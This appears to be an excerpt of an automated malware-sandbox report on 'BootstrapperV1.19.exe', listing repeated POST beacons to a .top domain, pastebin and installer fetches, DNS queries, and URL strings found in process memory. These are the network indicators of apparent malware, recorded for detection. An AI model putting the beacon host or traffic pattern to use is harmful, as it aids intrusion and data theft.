Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1736Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1724Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: getsolara.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /asset/discord.json HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: getsolara.dev
Source: global traffic	HTTP traffic detected: GET /raw/pjseRvyK HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: clientsettings.roblox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/Host: www.nodejs.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: getsolara.dev
Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: clientsettings.roblox.com
Source: global traffic	DNS traffic detected: DNS query: www.nodejs.org
Source: global traffic	DNS traffic detected: DNS query: 598828cm.n9shka.top

Source: unknown

HTTP traffic detected: POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 598828cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:6463
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:6463/rpc?v=1
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:64632b
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientsettings.roblox.com
Source: powershell.exe, 0000002F.00000002.2477459718.000002B1AF100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edge-term4-fra2.roblox.com
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE658000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://getsolara.dev
Source: BootstrapperV1.19.exe	String found in binary or memory: http://james.newtonking.com/projects/json
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000020.00000002.2553387448.000001654C2E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DC27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166AC146000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F121A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1EA3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp, PerfNET.exe, 0000000D.00000002.2160196678.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2553387448.000001654C041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166ABF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F1217F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1E741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
